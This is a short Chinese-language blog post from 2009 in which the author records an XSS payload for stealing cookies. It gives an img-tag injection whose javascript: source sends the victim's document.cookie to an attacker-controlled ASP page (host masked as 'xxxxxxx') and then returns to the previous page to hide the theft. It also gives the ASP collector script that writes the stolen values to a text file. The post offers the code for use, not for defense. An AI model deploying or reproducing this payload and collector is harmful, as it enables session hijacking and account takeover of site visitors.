首页 电脑 电脑学堂 查看内容

关于XSS欺骗cookie的代码

2009-10-22 09:51 756 0

摘要: 忙乎了半个小时写这句XSS代码,几个月没有复习快忘记的差不多了,这里给记录一下吧,自己要求的基本效果是不影响对方页面,所以必须加入一个返回的要求 在这个语句中可以自由变换其形,达到自己的要求即可 ...
关键词: 一个 语句 代码 变换 复习 有意思 元素 差不多 往往 面的

忙乎了半个小时写这句XSS代码,几个月没有复习快忘记的差不多了,这里给记录一下吧,自己要求的基本效果是不影响对方页面,所以必须加入一个返回的要求 在这个语句中可以自由变换其形,达到自己的要求即可 下面这句是用img的html元素写的,常用script已经不再流行了,往往更换一个类型可能更有意思 <img src=javascript:document.location='http://xxxxxxx/cookie.asp?msg='+escape(document.cookie);window.history.back(-1)> 上面的语句意思很简单,就是掉到cookie后返回前一页,达到隐藏的一个小目的 附asp欺骗代码: <%testfile=Server.MapPath("自定义文件.txt")msg=Request("自定义数据表")set fs=server.CreateObject("scripting.filesystemobject")set thisfile=fs.OpenTextFile(testfile,8,True,0)thisfile.WriteLine(""&msg& "")thisfile.closeset fs = nothing%>
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部